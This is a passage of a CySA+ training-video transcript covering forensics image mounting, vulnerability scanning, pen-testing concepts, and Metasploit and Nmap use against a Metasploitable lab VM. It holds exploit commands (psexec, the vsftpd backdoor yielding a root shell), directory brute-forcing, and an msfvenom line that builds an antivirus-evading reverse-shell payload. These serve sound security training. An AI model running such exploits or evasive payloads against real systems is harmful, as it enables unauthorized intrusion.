Nothing has been mounted, so I'm going to go ahead and mount /sdb1.img to /analyze.
[Video description begins] He executes the following command: mount /sdb1.img /analyze/. No output displays
and the prompt remains the same. [Video description ends]
And when I do an ls of /analyze again, we're going to see now that we can actually see files.
[Video description begins] He executes the following command: ls /analyze/. The output displays a list of files
and directories. [Video description ends]
So at this point, we would be able to run whatever forensic analysis tools are necessary to take a look at file
contents. Perhaps recover deleted files, and so on.
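For reference, here's a minimal sketch of that mount sequence, with one addition worth considering: in a forensics workflow you would typically mount the image read-only so that examining it can't alter the evidence. The image path and mount point are the ones from this demo:

mkdir /analyze                        # create a mount point
mount -o ro,loop /sdb1.img /analyze   # loop-mount the image read-only
ls /analyze                           # browse the captured file system
umount /analyze                       # detach when finished

The demo mounted the image with default options; adding -o ro,loop is a common precaution rather than a requirement of the mount command.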
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, we've examined digital forensics, including the proper gathering and handling of digital
evidence. And common digital forensics hardware and software solutions. We did this by exploring the
purpose of digital forensics. We talked about the importance of the chain of custody for proper evidence
gathering and handling. And we also discussed common digital forensics hardware and software solutions.
Next, we talked about how to image a Linux drive using the dd command. How to enable legal hold for an
AWS S3 bucket. And finally, how to restore deleted files on both the Linux and Windows platforms. In our
next course, we'll move on to explore network scanning and traffic analysis techniques that are available to
help secure an organization's networks, hosts, apps, and data. Including looking at vulnerability scanning,
penetration testing, and intrusion detection and prevention.
Table of Contents
Objectives
[Video description begins] Topic title: Course Overview. The presenter is Dan Lachance, an IT Trainer /
Consultant. [Video description ends]
Hi, I'm Dan Lachance. I've worked in various IT roles since the early 1990s, including as a technical trainer, as
a programmer, a consultant, as well as an IT tech author and editor. I've held and still hold IT certifications
related to Linux, Novell, Lotus, CompTIA, and Microsoft. Some of my specialties over the years have
included networking, IT security, cloud solutions, Linux management and configuration, and troubleshooting
across a wide array of Microsoft products. The CS0-002 CompTIA Cybersecurity Analyst, or CySA+
certification exam, is designed for IT professionals looking to gain security analyst skills. To perform data
analysis. To identify vulnerabilities, threats and risks to an organization. To configure and use threat detection
tools. And secure and protect an organization's applications and systems.
In this course, we're going to explore how to identify security weaknesses that may exist in networks, hosts,
and apps using techniques such as vulnerability scanning and penetration testing. I'll start by examining how
vulnerability scanning can identify security weaknesses. And how penetration testing can identify and exploit
security weaknesses. I'll then explore the Metasploit Framework, demonstrate how to run an Nmap network
scan, and show how to identify changes using network scanning comparisons. Next, I'll demonstrate how to
run both a Nessus and an OpenVAS vulnerability scan. Lastly, I'll use the hping tool to generate network SYN
flood traffic.
[Video description begins] Topic title: Vulnerability Scanning. The presenter is Dan Lachance. [Video
description ends]
Vulnerability scanning is a very important IT security activity. It should be run periodically to determine an
organization's security posture and for continuous security control improvement. Vulnerability scanning is all
about identifying weaknesses. Whether those weaknesses exist at the network level, on a specific host, or even
within a host, within a particular application. The type of vulnerability scanning that you need to conduct will determine which tool you use to perform the task.
This type of scanning is considered relatively passive because when you look for vulnerabilities, you are simply seeking weaknesses, not choosing to exploit them as you would with a penetration test, which is considered much more intrusive. There are a lot of tools available to perform vulnerability scans including
Nessus, OpenVAS and Qualys. Many of these tools support something called the Security Content Automation Protocol, or SCAP for short. The purpose of SCAP is to use automation to monitor security incidents and to ensure that devices and hosts on the network are compliant with established security standards and configurations.
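As one hedged example of SCAP in practice, the OpenSCAP scanner can evaluate a host against a published baseline from the command line. The profile ID and data stream path below are placeholders of the kind shipped with the SCAP Security Guide, not values from this demo:

# Evaluate this host against a hardening profile and write an HTML report
oscap xccdf eval \
  --profile xccdf_org.ssgproject.content_profile_cis \
  --report /tmp/scap-report.html \
  /usr/share/xml/scap/ssg/content/ssg-ubuntu2004-ds.xml

The report then lists each rule in the profile and whether the host passed or failed it.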
[Video description begins] The Vulnerability Scanning Process. [Video description ends]
Vulnerability scanning can be conducted legitimately by IT security technicians. But also maliciously by
malicious actors that are seeking to perform reconnaissance. So either way, the scanning process begins with
scanning an entire network. Now in order for that to happen, the scanner has to have access to the network. So
a malicious user, for instance, would have to connect to a Wi-Fi or a wired network in order to begin conducting the scan. Even if they can't get their own device onto the network, another option for a malicious user would be to fool somebody through social engineering into clicking on something, which might trigger malware to run on the victim's machine, which is already on the inside. And then from there, the scan can take place and the results can be sent to an anonymous account out
on the Internet. So there are a lot of ways that this can actually take place. So after scanning the network, the
next order of business is to scan the devices on the network. Specifically, those devices that show up as being
responsive and running particular services. After which those devices can be scanned looking for specific
vulnerabilities. For example, if we have got a Windows server running the IIS or Internet Information Services
web server stack. Then the vulnerability scanning tool can use a vulnerability database, which ideally is up-to-
date. Looking for specific vulnerabilities for that version of that software.
[Video description begins] Vulnerability Scanning Considerations. [Video description ends]
The first thing we should consider with vulnerability scanning is we might trigger some alarms out on the
network. So, if you've got a centralized SIEM solution for security incident monitoring, you could
trigger some rules. Correlation rules are used to identify anomalies on the network and then generate some
kind of an action. Such as an alarm that might be triggered and a notification sent to administrators when
malware infections are detected. Taking that a step further with SIEM, you might even have a SIEM model that essentially profiles an app or a user and, from that profile, can determine any deviations from the norm. Either way, these could be triggered when running vulnerability scans. So it's something to think about.
In order for the results of the vulnerability scan to have a lot of meaning, you need to decide what's normal in
your environment. Is it normal that there are a lot of workstations out on the network with shared folders
running a web server stack? And we're talking about client stations, is that normal in your environment? It
might be, if those users are software developers and need those tools. We need to keep our vulnerabilities
database up-to-date. So a vulnerability scanner uses a database that it checks when it is connecting to devices
on the network. Looking for specific detailed vulnerabilities for specific software versions. So you want to
make sure that the vulnerabilities database is always kept up-to-date. You have to determine the scope or the
scan targets that will be scanned in the first place. You have to determine in your vulnerability scanning tool, if
you could use credentialed or non-credentialed scans.
A credentialed scan means you are entering in credentials that can be used when attempting connectivity to
devices on the network. Now, if you really want to test what it would be like for a malicious user that doesn't have access to those credentials, you could run a non-credentialed scan to get a sense of what it might look
like if there was malware or a malicious user performing the scan on an internal network. Both have their
place, both are important. Because a credentialed scan might point out security weaknesses that otherwise
wouldn't show up with a non-credentialed scan. So both are important. Then there's the reporting aspect to
identify perhaps any changes. You can run vulnerability scans periodically and you should. And you can
compare them, and by comparing them you can see anything that's changed. As in, why are there now some
new Linux hosts and wireless access points on the network when they didn't show up in last week's
vulnerability scan?
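One way to automate that comparison, assuming your discovery scans were done with Nmap and saved as XML, is the ndiff utility that ships with Nmap. The file names and address range below are just illustrative:

nmap -sn -oX lastweek.xml 192.168.4.0/22   # last week's discovery scan, saved as XML
nmap -sn -oX thisweek.xml 192.168.4.0/22   # this week's discovery scan
ndiff lastweek.xml thisweek.xml            # show hosts and ports that appeared or disappeared

Anything new in the diff, such as unexpected hosts or newly opened ports, is worth investigating.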
After completing this video, you will be able to recognize how pen testing identifies and exploits security
weaknesses.
Objectives
[Video description begins] Topic title: Penetration Testing. The presenter is Dan Lachance. [Video description
ends]
Penetration testing actively discovers vulnerabilities on hosts on the network, including within specific apps running on those hosts, and it attempts to exploit those discovered vulnerabilities.
There are a number of attributes that a penetration tester should have, ranging from technical skills to personality traits. The first skill set would be knowledge of operating systems and network protocols. So for instance, understanding,
not only Windows, but Linux variants, how to work at the command-line. Understanding how packets are sent
over a network and how to dissect a packet capture that was taken from the network. So a knowledge of
network protocols is important. A knowledge of IT infrastructure hardware, storage arrays, UPS systems,
server hardware, routers, switches, VPN appliances.
All of this is going to be very important for the pen tester. A knowledge of where to get threat intelligence
information, there are numerous threat intelligence sources available out on the Internet. And of course, a
penetration tester has to have a passion for IT. They have to be a self-learner and like to solve problems. Pen
testers should really have the ability to write scripts or code. The language isn't important. But having an
understanding of how to manipulate at least one scripting or programming language is generally considered
important for pen testers. They need to have a persistent personality. That kind of links back to the problem
solver trait of a pen tester.
[Video description begins] Pen Test - Rules of Engagement. [Video description ends]
There are normally rules of engagement before engaging in a penetration test. Such as the scheduling, when it
will occur. The fact that there could be potential service disruptions. So this means that if we are legitimately
conducting a pen test for an organization, we need to make sure that we've got sign-off, legal documentation,
assuring that the scheduling makes sense and that there could be service disruptions. And that that is an
acceptable risk. Often, rules of engagement will also include a non-disclosure agreement needing to be signed,
in case, pen testers come across sensitive information due to vulnerabilities having been successfully exploited.
[Video description begins] Non-disclosure agreement abbreviates to NDA. [Video description ends]
If you're pen testing in a cloud environment, make sure you read up on that cloud provider's details related to
pen testing. While some pen tests might be allowed even without express written permission from the cloud
provider, others like denial-of-service attacks might be strictly prohibited, since it could affect other cloud
tenants.
Pen testing uses the notion of red and blue teams. The red team is the team that executes the pen tests at the
network level, against network devices, and of course, against applications and databases that might exhibit
weaknesses. So it simulates real world attacks. The blue team monitors for these security events. So it's more
representative of the internal IT security team. Their purpose is to prevent and stop attacks. And also to
educate IT staff on mitigation strategies and techniques used to prevent and reduce the impact of attacks. A
white box test is also called a transparent test. This means that there are a lot of details known to the testing
team. Things like implementation details for a network, a host, or an app. They have access to documentation
such as for a custom piece of software. It also can help illustrate what might happen if there is an insider type
of threat, whether intentional or unintentional.
Black box testing is quite different because the details of the internal configuration and implementation of a
solution are unknown to the testing team. So a black box test then is similar to what you might expect from an
external attack. Where the external attackers don't really have a lot of internal detailed information. So it
identifies weaknesses that are exploitable. A gray box test falls somewhere in between. What this means is that
some implementation details are known to the testing team. Now, source code is not known as it would be in a
white box test. However, there might be some knowledge of some security controls put in place. Such as a
specific type of firewall appliance and the version of the firmware running in it. And there might be some
configuration details known, such as network address ranges in use.
After completing this video, you will be able to recognize how Metasploit fits into penetration testing.
Objectives
[Video description begins] Topic title: Metasploit Overview. The presenter is Dan Lachance. [Video
description ends]
A version of the Metasploit Framework is available automatically when you run Kali Linux. The framework is based on Ruby, which is just a general-purpose programming language. Now,
there are a number of components that comprise the Metasploit Framework, starting with auxiliaries. Now, an
auxiliary isn't used to actually exploit a vulnerability. It's more for things like reconnaissance, for scanning,
looking for vulnerabilities, or even for applying fuzz tests, that type of thing. Now an exploit is the actual code
that executes on a machine once a vulnerability is detected. So it's designed to take advantage of the weakness,
whatever that weakness happens to be. Then we've got the payload.
The payload is code that executes once the exploit compromises a system. It's often used to provide the
attacker with a reverse shell. Where the victim hacked machine contacts the attacking machine where the
attacker can enter commands. And finally, you have post-exploitation modules that are available. These are
used so you can run other tasks after you've compromised a system. Maybe to enumerate file systems or
enumerate other network hosts from that compromised system's perspective, or enumerate user accounts on
that system, that type of thing. Metasploit Framework auxiliary modules are located under
/usr/share/metasploit-framework/modules, and then /auxiliary. And some example folders that you'll see in that directory are admin, client, server, cloud, gather, and spoof. Gather would be an example of running some
kind of a reconnaissance scan to learn more about something. Such as the version of a web server that's
running.
Then there's the concept of Metasploit Framework Encoders. The purpose of an encoder is to obfuscate
something when you're generating malicious payloads. Why would you want to do that? Well, you would
normally do this, if you've got some kind of characters that you don't want detected by an antivirus system. Or
maybe there's an exploit that only succeeds when you provide it a certain type of characters. So you can use an
encoder for those purposes. So the intent here is to bypass detection of some kind of malicious type of
character like a null value. So this would be used to bypass detection from intrusion detection systems or IDSs,
intrusion prevention systems, IPSs, and anti-virus type of solutions. Now you don't have to specify this unless
you want to, but by default, Metasploit will choose the best encoder to use. So it removes characters that could
easily be deemed suspicious or malicious. So removing things like null bytes or non-alphanumeric characters.
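As a hedged illustration, payload encoding is typically done with the msfvenom utility that accompanies the framework. Something along these lines, where the addresses and output path are placeholders rather than values from this demo, and bearing in mind that modern antivirus will often still flag encoded payloads:

# Generate a Windows reverse-shell payload, encoded with shikata_ga_nai over
# several iterations, avoiding null bytes that might trip detection
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.4.20 LPORT=4444 \
  -e x86/shikata_ga_nai -i 5 -b '\x00' -f exe -o /tmp/payload.exe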
[Video description begins] Topic title: Explore Metasploit. The presenter is Dan Lachance. [Video description
ends]
The Metasploit Framework is included within Kali Linux. And it's a great penetration testing tool to not only
discover but attempt to exploit any discovered weaknesses. Of course, only with the express permission of
system owners. So to get started here in Kali Linux, I'm going to run msfconsole.
[Video description begins] The following window is open: dlachance@kali:~. The following prompt is
displayed: root@kali:~#. [Video description ends]
That's for Metasploit Framework Console. We'll just press Enter and give that a moment to load up.
[Video description begins] He executes the following command: msfconsole. The output displays that the
msfconsole has started. The output includes information about the metasploit version number, number of
exploits, and number of encoders. The prompt changes to msf5 >. [Video description ends]
And after a moment, we can see that we've started the MSF console as evidenced by our command prompt. It
says msf5 as opposed to being in a regular Linux shell. We can also see the version of Metasploit listed here at
the top, along with the number of exploits and payloads and encoders and so on. So I'm going to go ahead and
type clear to clear the screen. We're going to do an ls of the /usr/share/metasploit-framework. And then we're
going to go further within that and look at the module, so /modules.
So when I press Enter, notice here that we can see there are subdirectories for auxiliary, encoders, evasion,
exploits, nops, payloads, post, a lot of stuff here. So for example, if I were to go into the exploits location. So
let's bring up the previous command with the up arrow key. Let's change ls to cd, just for fun. So we can
change directory into one of these things. Now let's go into the exploits location. And I'll do an ls. Now we can
see we've got categories here such as for Android, and for Apple iOS, for BSD UNIX.
For Windows, well, let's go into windows, I'm going to change directory to windows. We'll do an ls in here.
And then we can see it's organized by the specific category, whether it's antivirus, backdoor, email, http, and so
on.
[Video description begins] He executes the following command: cd windows. No output returns and the
prompt does not change. He executes the following command: ls. The output displays a list of files and
directories in windows. The prompt does not change. [Video description ends]
So the list goes on and on and on. So this is where the file system layout really does show up. Now I can use the
back command to keep going back multiple levels once I've navigated into a specific exploit location.
[Video description begins] He executes the following command: back. No output returns and the prompt does
not change. [Video description ends]
So for example, let's say I were to type use exploit/windows/smb/psexec. So once I do that, notice that the
command prompt changes.
[Video description begins] He executes the following command: use exploit/windows/smb/psexec. No output
returns and the prompt changes to msf5 exploit(windows/smb/psexec) >. [Video description ends]
I'll clear the screen here so we can see that we're in that location for that exploit. And this is where if I were to
type back, it would take me back to where we were before we actually started that. However, I'm going to use
the up arrow key to bring that back up for a moment.
[Video description begins] He executes the following command: back. No output returns and the prompt
changes to msf5 >. [Video description ends]
Now you would use an exploit because you want to start configuring it. And then running that exploit to test a
vulnerability to actually see if it's exploitable.
[Video description begins] He executes the following command: use exploit/windows/smb/psexec. No output
returns and the prompt changes to msf5 exploit(windows/smb/psexec) >. [Video description ends]
Now, when you're in an exploit, you can type show options to see what can be set. There are a lot of variables here.
[Video description begins] He executes the following command: show options. The output displays a list of
variables. The prompt does not change. [Video description ends]
Such as remote hosts, the remote port number, the service description, the share name, the SMB password,
SMB username, and so on. We can also, if I just clear the screen, type show payloads. Now these payloads will
be specific to working with windows/smb/psexec.
[Video description begins] He executes the following command: show payloads. The output displays a list of
payloads. The prompt does not change. [Video description ends]
So we can see there are a lot of payloads here that can be executed, such as injection types of attacks against
VNC, and so on. So there's a lot that's available in here. So I'm going to go ahead and use a payload, let's say,
use payload/windows/shell_bind_tcp. So you kind of have to know what these things are called. But you can
figure that out by typing in these commands to learn about which ones are available.
So I'm going to clear the screen to do that. So from here I could type show options again. And when I do that, I can see the specific variables that we could set the value of using the set command. By the way, we can also see the current setting for the variables.
[Video description begins] He executes the following command: show options. The output displays a list of
variables, their current setting, whether the variable is required, and their description. The prompt does not
change. [Video description ends]
And whether or not the variable is required, whether it's mandatory. So I'm going to go ahead and type back,
just to back out of this.
[Video description begins] He executes the following command: back. No output returns and the prompt
changes to msf5 >. [Video description ends]
I'm also going to type in search. And let's say that we know the name of a specific category we're looking for. In other words, I'm looking for exploits related to the Microsoft platforms, so I'll filter on the name Microsoft and the type exploit. So, I'm searching for name:Microsoft type:exploit.
[Video description begins] He executes the following command: search name:Microsoft type:exploit. The
output displays a list of exploits with the name Microsoft. The prompt does not change. [Video description
ends]
Now, we can see that we have quite a large list that has shown up here. So this is how you would know, for
example, what to use. Here we've got exploit/windows/smb, and we've got ms05, so I could use the use
command.
We can say show options, we can start to see some of the variables here that we might want to set before we
actually run any of these attacks.
[Video description begins] He executes the following command: show options. The output displays a list of
variables. The prompt does not change. [Video description ends]
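Pulling those steps together, a typical msfconsole session follows the same pattern each time: pick a module, inspect its options, set the required variables, choose a payload, and run it. Here's a minimal sketch of that sequence; the target address, credentials, and chosen payload are placeholders rather than values from this demo, and setting the payload with the set command is one common approach:

msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > show options
msf5 exploit(windows/smb/psexec) > set RHOSTS 192.168.4.50
msf5 exploit(windows/smb/psexec) > set SMBUser administrator
msf5 exploit(windows/smb/psexec) > set SMBPass P@ssw0rd
msf5 exploit(windows/smb/psexec) > set payload windows/shell_bind_tcp
msf5 exploit(windows/smb/psexec) > run

If the exploit succeeds, a session opens against the target; the back command returns you to the main msf5 prompt.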
In this video, find out how to download and install a VM that can be exploited.
Objectives
[Video description begins] Topic title: Metasploitable. The presenter is Dan Lachance. [Video description
ends]
If you use your favorite web search engine and search up Metasploitable, it won't be difficult to locate this
download page. Metasploitable is a virtual machine that's purposely been configured to be vulnerable that you
can run pen tests against. Such as using Kali Linux and the Metasploit framework.
Now on this page down at the bottom, you first have to fill out a form before you can proceed with submitting.
And then, ultimately downloading a virtual machine disk from which you can build a virtual machine. Here,
I'm using VMware Workstation 15.5 PRO. So I'm going to go ahead and click Create a New Virtual Machine.
[Video description begins] He switches to the vmware WORKSTATION 15.5 PRO window. It includes a button
labeled "Create a New Virtual Machine". [Video description ends]
Since, I've already downloaded the specific virtual machine disk file for Metasploitable.
[Video description begins] A wizard called "New Virtual Machine Wizard" opens. A page called "Welcome to
the New Virtual Machine Wizard" is open. It includes a radio button labeled "Custom (advanced)" and a
button labeled "Next". The Custom (advanced) radio button is selected. [Video description ends]
So I'm going to use Custom. Next, I'm going to accept a lot of the defaults in the wizard here.
[Video description begins] A page called "Choose the Virtual Machine Hardware Compatibility" opens. It
includes a button labeled "Next". A page called "Guest Operating System Installation" opens. It includes a
radio button labeled "I will install the operating system later" and a button labeled "Next". The "I will install
the operating system later" radio button is selected. [Video description ends]
I'll choose, I will install the operating system later. Next, it's going to be Linux, Ubuntu 64-bit
[Video description begins] He clicks the "Next" button and a page called "Select a Guest Operating System"
opens. It includes a radio button labeled "Linux", a drop-down list box labeled "Version", and a button
labeled "Next". The "Linux" radio button is selected, and the following option is selected in the "Version"
drop-down list box: Ubuntu 64-bit. [Video description ends]
and I'm going to leave the Virtual machine name and Location the same as the default there.
[Video description begins] He clicks the "Next" button and a page called "Name the Virtual Machine" opens.
It includes a text box labeled "Virtual machine", populated with the following text: Ubuntu 64-bit. It also
includes a button labeled "Next" and a text box labeled "Location". [Video description ends]
[Video description begins] He clicks the "Next" button and a page called "Processor Configuration" opens. It
includes a button labeled "Next". [Video description ends]
[Video description begins] He clicks the "Next" button and a page called "Memory for the Virtual Machine"
opens. It includes a button labeled "Next". He clicks the "Next" button and a page called "Network Type"
opens. It includes a button labeled "Next" and four radio buttons labeled "Use bridged networking", "Use
network address translation (NAT)", "Use host-only networking", and "Do not use a network
connection". [Video description ends]
Your environment will determine what kind of network connection you enable for your Metasploitable virtual machine. In my case, I'm on a segmented, isolated network. So, I'm going to use bridged networking to actually make a connection to the network with the Metasploitable virtual machine. Then I'll click Next. And I'll keep going
through this until I get to the Select a Disk part of the VMWare workstation wizard.
[Video description begins] He clicks the "Next" button and a page called "Select I/O Controller Types" opens.
It includes a button labeled "Next". He clicks the "Next" button and a page called "Select a Disk Type" opens.
It includes a button labeled "Next". He clicks the "Next" button and a page called "Select a Disk" opens. It
includes a button labeled "Next". It also includes three radio buttons labeled "Create a new virtual disk", "Use
an existing virtual disk", and "Use a physical disk". [Video description ends]
And I'm going to tell it to Use an existing virtual disk and of course as I proceed, that would be the one that
I've downloaded.
[Video description begins] He switches to a window called "Metasploitable 2". It includes a "Power on this
virtual machine" link. [Video description ends]
[Video description begins] A command prompt window opens. The screen prompts for the metasploitable
login. [Video description ends]
I'm going to click the Power on this virtual machine button and you're going to see that Linux is going to go
ahead and start up.
[Video description begins] The screen prompts for the password. [Video description ends]
After which, we can log in with the default username and password of msfadmin.
[Video description begins] The following prompt is displayed: msfadmin@metasploitable:~$. He executes the
following command: clear. No output returns and the prompt does not change. [Video description ends]
[Video description begins] He executes the following command: ifconfig. The output displays the network
configuration. The prompt does not change. [Video description ends]
[Video description begins] He points to the following ip address in the output: 192.168.4.56. [Video
description ends]
And, if I do an ifconfig that will reveal the IP address that I can use in my pen testing tools like the Metasploit
Framework.
[Video description begins] He switches to the Metasploitable2 - Linux web page in the browser. [Video
description ends]
And, if I pop that IP address into the address bar of a web browser, this is the page you should see, which is
telling you that it's up and running.
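Before pointing any scanning tools at it, it can be worth confirming from the Kali machine that the Metasploitable VM is actually reachable. A quick hedged check, using the IP address shown in this demo:

ping -c 3 192.168.4.56         # basic reachability
curl -I http://192.168.4.56/   # the default web page should answer on port 80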
In this video, find out how to use a variety of metasploit scanning and exploitation techniques.
Objectives
[Video description begins] Topic title: Metasploit Scanning and Exploits. The presenter is Dan
Lachance. [Video description ends]
Before using the Metasploit Framework to target hosts and test vulnerabilities to see how exploitable they are (of course, only on systems that you have express permission to do that against), you might first run a tool like Nmap to discover which hosts are actually active on the network.
[Video description begins] The following window is open: dlachance@kali:~. The following prompt is
displayed: root@kali:~#. [Video description ends]
So I'm going to start with nmap, the network mapper tool, and I'm going to pass it a -sn. All this means is, I
don't want to do any port scanning. I just want to discover, which hosts are responsive on the network. So I
have to give it the network range. Here I'm going to put in 192.168.4.0/22. There are 22 bits in the subnet mask
the way my network segment is configured. So I'm going to go ahead and press Enter.
[Video description begins] He executes the following command: nmap -sn 192.168.4.0/22. The output displays
a list of network hosts. The prompt does not change. [Video description ends]
This shouldn't take long because it's not doing any kind of a deep, thorough probe of any devices that are up on
the network. It's only going to show us who's responding. And that would be a good starting point before
starting to test some of the Metasploit exploits. So here we can see the list is complete. So we can see that
hosts are listed as either being up, or it looks like all of these ones are up and running. So that's good. There's
plenty of them here.
[Video description begins] He executes the following command: clear. No output returns and the prompt does
not change. [Video description ends]
Now the next thing to consider is that we can also run nmap and do some fingerprinting. So, I'll pass -sV, meaning I want service version details. And along with that, -O, meaning I want to do some OS fingerprinting. And I'm
going to give it the IP address in this case of a host that I want to test access against. So I'm going to go ahead
and press Enter to see what we can learn about this host. Now, how patched the host is
[Video description begins] He executes the following command: nmap -sV -O 192.168.4.56. The output
displays that the IP address has been scanned. The prompt does not change. [Video description ends]
and how hardened it is will determine what kind of information we get back from this nmap
command. Okay, looks like we've learned a lot. This is a Linux 2.6 kernel host. And it looks like if we kind of
scroll up here in the output, we get a sense of some of the open ports. It's running a lot of services. And we can
actually see the version of a lot of these services that are running on this host. So this is not a hardened host by
any stretch of the imagination.
[Video description begins] He executes the following command: clear. No output returns and the prompt does
not change. [Video description ends]
So the first thing I'm going to do here is run the use command: use auxiliary/scanner/http/http_version. So I want to do a bit of HTTP reconnaissance against that specific host. Now if I type show options, here I can see that we've got a couple of required items like RHOSTS; that variable has to be set.
[Video description begins] He executes the following command: show options. The output displays a list of
variables, their current setting, whether the variable is required, and their description. The prompt does not
change. [Video description ends]
Currently, there's no setting. And under Required it says yes, of course, the Description tells us about that. The
remote port, well, probably 80 if it's just an HTTP web server, 443 if HTTPS. We've got a couple of other
items here, some of which are required. So what I'm going to do then is I'm going to use the set command to
set the value of some of these items, these variables, set RHOSTS. And I'm going to set the target here to be
192.168.4.56. I know that is a vulnerable virtual machine under my control, so I don't need to get permission to
run these commands against it.
[Video description begins] He executes the following command: set RHOSTS 192.168.4.56. The output reads:
RHOSTS => 192.168.4.56. The prompt does not change. [Video description ends]
And after I've done that, I can also determine, if I want to set any other items, any other variables. Well,
RPORT is already set to a value of 80.
[Video description begins] He executes the following command: clear. No output returns and the prompt does
not change. [Video description ends]
Let's just clear the screen here, show options. You can also see that our RHOSTS is now configured, we've got
a setting.
[Video description begins] He executes the following command: show options. The output displays a list of
variables, their current setting, whether the variable is required, and their description. The prompt does not
change. [Video description ends]
So at this point, we're ready to simply run this. I'm going to go ahead and type run.
[Video description begins] He executes the following command: clear. No output returns and the prompt does
not change. [Video description ends]
So what it's going to do is scan that host on port 80, and we already know now it's identified what it's running.
[Video description begins] He executes the following command: run. The output displays that the scan of the
host is complete and the auxiliary module execution is complete. The prompt does not change. [Video
description ends]
It's running the Apache Web Server 2.2.8 on Ubuntu Linux and we can even see it's got PHP there, okay. So
part of reconnaissance is determining what is running out there. Let's say, I were to change this to something
else that might be a little more hardened or resilient to returning this kind of information. So I'm going to set
RHOSTS. In this case to a different IP address, and I'm going to type run.
[Video description begins] He executes the following command: set RHOSTS 192.168.4.1. The output reads:
RHOSTS => 192.168.4.1. The prompt does not change. He then executes the following command: run. The
output displays that the scan of the host is complete and the auxiliary module execution is complete. The
prompt does not change. [Video description ends]
Notice this time we didn't get anything; we don't know if it's running Apache or IIS or Nginx. We don't know what kind of web server is there. In fact, there is none; we have nothing returned. So having done that,
that's fine. Let's do something else. Let's see if we can brute force and scan through an app looking for open
subdirectories.
[Video description begins] He executes the following command: clear. No output returns and the prompt does
not change. [Video description ends]
That essentially will let us view information that otherwise might be designed to be private. So I'm going to use auxiliary once again: auxiliary/scanner/http/brute_dirs. Okay, so it looks like that has taken effect.
So again, if I type show options, we can see some of the variables here and whether or not they are required.
[Video description begins] He executes the following command: show options. The output displays a list of
variables, their current setting, whether the variable is required, and their description. The prompt does not
change. [Video description ends]
Notice that RHOSTS the variable didn't carry over. We didn't work with it as a global variable, and it is
required. So that's my target. So I'm going to set RHOSTS and I'm going to use the same target in this case.
And at this point, I'm going to go ahead and type run.
[Video description begins] He executes the following command: clear. No output returns and the prompt does
not change. He executes the following command: set RHOSTS 192.168.4.56. The output reads: RHOSTS =>
192.168.4.56. The prompt does not change. [Video description ends]
So it looks like it's trying to essentially enumerate through everything on that web site.
[Video description begins] He executes the following command: run. The output displays that the scan of the
host is complete and the auxiliary module execution is complete. The prompt does not change. [Video
description ends]
It is a web app. And we're getting some 404 not found and it's looking for a couple of other items as well. Okay,
so looks like we didn't get too much really returned. It did say it found two subdirectories, /dav and /doc, that
potentially might be open. Let's set RHOSTS to another web application that is under our control. You never
want to run these against sites you don't have access to. Because you might render the site unusable and that
could be considered illegal. So we'll specify a different host this time at a different IP address. And let's go
ahead and run this again.
[Video description begins] He executes the following command: set RHOSTS 192.168.4.54. The output reads:
RHOSTS => 192.168.4.54. The prompt does not change. He executes the following command: clear. No
output returns and the prompt does not change. [Video description ends]
So I'm just going to type run, now that we've set that to be something different.
[Video description begins] He executes the following command: run. The output displays that the scan of the
host is complete and the auxiliary module execution is complete. The prompt does not change. [Video
description ends]
And this time we don't really get anything that's returned like we did with the previous example. So here in a
web browser, if I actually try to connect to something that was shown in our previous example as being found, we can see indeed it looks like there's a directory here on this web app that probably shows a little bit too much information.
[Video description begins] He switches to a browser and the following URL is open: 192.168.4.56/doc/. The
page displays a list of folders. [Video description ends]
So as we scroll through, we can see a lot of stuff in the Linux file system that we probably shouldn't be able to
see. Next, let's take a look at what we might be able to exploit in terms of FTP server daemon vulnerabilities.
[Video description begins] He switches back to the command prompt window. [Video description ends]
So I'm going to go ahead and use an exploit. And I'm going to go into exploit/unix/ftp/vsftpd_. And again, if
you've put in enough unique characters, you can press tab and it'll complete the name for you.
So let's go ahead and use that exploit, as usual, going to run show options. What do we have here?
[Video description begins] He executes the following command: show options. The output displays a list of
variables, their current setting, whether the variable is required, and their description. The prompt does not
change. [Video description ends]
RHOSTS, nothing in the Current Setting, no value for that variable, and it's required, okay. Not a problem.
Let's clear the screen and let's set RHOSTS 192.168.4 and in this case, I'm going to make it a host listening at a
specific IP, in this case, .56. All right, that looks good.
[Video description begins] He executes the following command: set RHOSTS 192.168.4.56. The output reads:
RHOSTS => 192.168.4.56. The prompt does not change. [Video description ends]
I'm going to set the remote port, RPORT to the standard FTP port of 21. That's fine.
[Video description begins] He executes the following command: set RPORT 21. The output reads: RPORT =>
21. The prompt does not change. [Video description ends]
Now when I run the exploit, it's looking like it's trying to make a connection. And it looks like it's actually opening a Command shell session. So it looks like we're in. How do we know that? Well, we could type in commands like ifconfig to
see what it returns. It's actually returning the IP address of that remote host. We have privileges on that remote
host at the command-line level, simply by talking to it through port 21 through FTP.
[Video description begins] He executes the following command: ifconfig. The output displays the system
details including the ip address. [Video description ends]
So, if I were to type commands like whoami, we can see we're logged in as user root there. If we were to type
ls /, we can see the root of the file system as well.
[Video description begins] He executes the following command: whoami. The output reads: root. [Video
description ends]
[Video description begins] He executes the following command: ls /. The output displays a list of files. [Video
description ends]
If we were to type in the hostname command, we can see this is actually a host called metasploitable.
[Video description begins] He executes the following command: hostname. The output reads:
metasploitable. [Video description ends]
So we are in. So this is only a tiny example, a tiny sampling of what is potentially available to run
exploits using the Metasploit Framework. Just make sure that you only run it against hosts that you have
express permission to run it against.
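For reference, here's a minimal sketch of that vsftpd sequence end to end. In recent Metasploit versions the tab-completed module is typically exploit/unix/ftp/vsftpd_234_backdoor, though the exact name can vary with the installed version, and the target address is the demo's Metasploitable VM:

msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.4.56
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RPORT 21
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > run

On success, a command shell session opens on the target, at which point commands such as whoami, hostname, and ls / execute on the remote host.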
During this video, you will learn how to run a Nmap network scan.
Objectives
[Video description begins] Topic title: Nmap Network Scan. The presenter is Dan Lachance. [Video
description ends]
Nmap stands for network mapper. It is a network scanning type of tool. It's not technically a vulnerability scanner; beyond identifying ports that respond, it doesn't actually check for database, application, or web app vulnerabilities. So to get started here in Kali Linux at the command-line, I'm going
to start by simply running nmap -sn.
[Video description begins] The following window is open: dlachance@kali:~. The following prompt is
displayed: root@kali:~#. [Video description ends]
This means all I want to do is get a list of network hosts that are up and running. I do not want to do a port scan
